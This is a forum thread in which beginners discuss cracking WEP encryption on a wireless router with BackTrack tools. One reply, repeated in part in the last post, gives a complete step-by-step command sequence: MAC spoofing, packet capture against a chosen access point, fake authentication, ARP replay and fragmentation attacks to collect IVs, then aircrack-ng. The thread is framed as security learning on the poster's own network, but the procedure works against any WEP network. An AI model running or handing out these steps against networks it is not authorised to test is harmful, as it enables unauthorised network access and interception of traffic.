Results 1 to 8 of 8

Thread: Aquiring ARP and IVs

  1. #1
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    5

    Default Aquiring ARP and IVs

    Hello All,

    My first post in Remote Exploit Forums, so hopefully I start off on the right foot.

    I have been taking a securities class and we used BT4 for the class. All of our work was in a lab environment, so it was meant to be accessed. Now I am testing what I learned on my home network. My first task has been to crack my WEP on my router. I am able to receive packets and collecting ARPs and IVs. I have an 128-bit encryption and through my reading, it suggests to have between 200k and 500k IVs. While I am collecting them, it is slow going. I have tried the command:

    iwconfig eth1 rate auto (I know I say eth1 but this card is the wireless)

    It seems that the amount of activity on the network greatly impacts the rate I am able to acquire ARPs and IVs. However, in my lab, there was not much activity and all the tutorials I watch; this number increases rapidly. Is there a way to increase the rate I acquire this data?

    The system I am using at home is also different then what I used for class. My BT4 machine is a VM machine on my Windows box, an XPS Notebook. I am having issues having my D510 to boot from the BT4 disc (another issue I think I can figure out on my own with the tons of information out there). So I am using BT3 boot disc which I got in my Hakin9 Mag. Not sure if that makes a difference?

    Thanks in advance.

  2. #2
    Member
    Join Date
    Dec 2007
    Location
    The Netherlands
    Posts
    267

    Default

    I assume your lab tutorial used one arp to inject into the router, making the IV's increase rapidly without being dependent on network activity.

    Look through the forums for some (arp) injection tutorials, it's not too hard once you have an ARP to work with.

  3. #3
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    5

    Default

    Thank you for the post. Now that you say that, I think I am missing a step. I am going back through my notes.

  4. #4
    Member
    Join Date
    Dec 2007
    Location
    The Netherlands
    Posts
    267

    Default

    You're welcome.

  5. #5
    Just burned his ISO
    Join Date
    Apr 2009
    Posts
    6

    Default

    OK I am new to all of this as well and I have seen times where the data would go really fast or really slow. After testing in different environments I found that this is due to the type of router firmware, not the distance away from the routers.

    As I was running a test in one environment I noticed the data was not going up at all because the ARP was not increasing like it was on most videos. I did however manage to get it working, it takes a little longer (still under 10 minutes). Like I said I am new at this, but after playing around with some settings here is the exact steps I take to get that ARP to increase.

    Open console
    Step 1.
    airmon-ng stop wlan0

    Step2.
    ifconfig wlan0 down

    Step 3.
    macchanger --mac 00:11:22:33:44:55 wlan0

    Step4.
    airmon-ng start wlan0

    Step 5.
    Clear screen

    Step 6.
    airodump-ng wlan0

    This will display a list of wireless networks
    Pay attention to the network channel and the PWR values. I like to choose a network with a higher PWR, even if there is only 1 showing under the DATA section. However I find that if there is a PWR value of 20-30 with nothing in DATA, I take note of the channel number and add that to the next command so my wireless interface is not scanning everything and can put its focus on one channel and one bssid.

    Step 7.
    Now that you have the BSSID, and Channel number press CTRL + C to cancel the previous airodump-ng command. Type the following new command using the BSSID and Channel number:

    airodump-ng -c 11 -w dlink --bssid 00:13:A5:6D:FF:0B wlan0

    -c = Channel
    -w = the file you create that will be used in the aircrack-ng steps. I usually keep this set to one word such as the ESSID you are attempting to access
    --bssid = Address of WAP (Wireless Access Point)

    Once this step is finished I tend to let it run and I minimize the console and open a new console, NOT A NEW TAB.

    Step 8.
    Minimize console and open a new console

    Step 9.
    The next step was the one of the two things that changed the way my ARP would increase. Type the following command in the new terminal window:

    aireplay-ng -1 1 -a 00:13:A5:6D:FF:0B -b 00:11:22:33:44:55 wlan0

    When you run this command you shoudl get a message saying that the ESSID is an Open network and you should get authentication. To verify this open the first window that is running Airodump-ng. The AUTH should display OPEN under it meaning that its using OPEN and not SHARED authentaction. Seeing im writing about OPEN thats going to be the value for this post.

    Minimize the Airodump-ng screen and bring back up the aireplay-ng command you just ran. Notice that it keeps going and going. This is because of the "-1 1" value we have entered. I like to keep this going as it keeps a steady flow of data from my box to the AP. This helps get my acks up and get the ARP flowing.

    Step 10.
    Minimize the Aireplay-ng terminal letting it continue to run the command and open a new terminal.

    Step 11.
    Type the following command:

    aireplay-ng -3 -b 00:13:A5:6D:FF:0B -h 00:11:22:33:44:55 wlan0

    After you enter this command you will notice the information that get displayed accross the top. This command will allow your interface to read packets, obtain ARP requests (which will increase your DATA value from Airodump-ng which you have minimized) and also present the amount of ACKS, Sent Packets and pps.

    I found this is where I was having no luck in getting my DATA to increase from Airodump-ng. I tested on 64 and 128 bit networks and nothing, this would just stay there collecting ACKS and not really doing anything.

    This next step is where I was able to get the ACKS to increase quicker, giving my DATA a short increase of value before everything just suddnly kicks in and starts flying.

    Step 12.
    Minimize the currently used Aireplay-ng terminal, letting it continue running, and open a new terminal window.

    Step 13.
    Type the following command
    aireplay-ng -5 -b 00:13:A5:6D:FF:0B -h 00:11:22:33:44:55 wlan0

    Once you enter this comand keep this window open. You will notice it will start reading packets. Once the packets are read it will ask you to use that packet. Press the letter "Y" on your keyboard and press enter. It will then send information to the AP. Once that packet is complete you will notice that if you look at the Airodump DATA value it will increase slightly. This process will repeat. After its completed trying that current packet it will ask you again, just keep pressing "Y" every time asked. This is why I keep this window on top of all others.

    Once this command has started running, bring back up the following two screens:
    Airodump-ng
    Aireplay-ng -3 (the terminal that displays the Packets, ACKS, ARP Requests)
    Move the windows around so you can see them all at the same time, makign sure to keep the window running Aireplay-ng -5 as the window with focus.

    Let this run and within a few minutes you will notice that the terminal running Aireplay0ng -3 will start flying with ARP Requests and your Airodump-ng window will start adding values to the DATA field really quickly, and before you know it you will have enough DATA to run your Aircrack-ng.

    As I said, this is the ONLY way I can get on specific Access Points. May or may not work for you, but playing with some settings and trial and error, this is what panned out to be the best method for me.

    Also note when running the command Aireplay-ng -5 when the data packet gets read and you choose to use it, you may sometimes see that it will start giving you a message saying that it has gotten a 384 bit keystream and if your lucky enough it will save it as a file for you which you can also use to increase your DATA values.

    One way to tell when your about to get a load of ARP Requests is to pay attention to the Aireplay-ng -3 screen. When this command is running all text is displayed with no spaces, or line breaks. As your computer keeps associating with the AP running this command it will eventually pause for a moment, this pause-like action will display a blank empty line so its not hard to miss, once you see this empty line or start seeing more and more of them, its pretty much a sign you are communicating and you are about to get all the ARP Requests needed to get a good DATA Value for Aircrack-ng.

  6. #6
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    14

    Default

    There is a video of these steps (the exact same steps) in the howto section.

    To be honest prosper I really hope you didn't watch the video and type out what he was doing, you could have just pointed him to it instead.

  7. #7
    Member
    Join Date
    Dec 2007
    Location
    The Netherlands
    Posts
    267

    Default

    Quote Originally Posted by Sejah View Post
    There is a video of these steps (the exact same steps) in the howto section.

    To be honest prosper I really hope you didn't watch the video and type out what he was doing, you could have just pointed him to it instead.
    plaintext is easier to print out than a video though

  8. #8
    Just burned his ISO
    Join Date
    Apr 2009
    Posts
    6

    Default

    Quote Originally Posted by Sejah View Post
    There is a video of these steps (the exact same steps) in the howto section.

    To be honest prosper I really hope you didn't watch the video and type out what he was doing, you could have just pointed him to it instead.

    Actually no I never watched the video, what I did was all by reading on here, trial and error and playing with some of the attributes.

    I found that by what I was doing I was not getting any ARP Requests.

    Since you mentioned the video he does what I does in a similar way, however he does not let the command below and letting it run, he did it once so it assosiciated. I did it to keep it associated, and it worked.
    Code:
    aireplay-ng -1 1 -a xx.xx.xx.xx.xx.xx -h xx.xx.xx.xx.xx.xx
    Also within the video he does not do the command
    Code:
    aireplay-ng -5 -b xx.xx.xx.xx.xx.xx -h xx.xx.xx.xx.xx.xx
    I found that adding these steps increased the speed of the ARP Requests and I was able to get enough IV's to do an aircrack-ng

    I dont watch and do, how do you learn, you need to make mistakes and learn as you go, and this method does the job for me quite well and as Citruspers said
    plaintext is easier to print out than a video though
    So I hope my method works for those who have difficulties. Im new at this and am only trying to learn what I can about network security.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •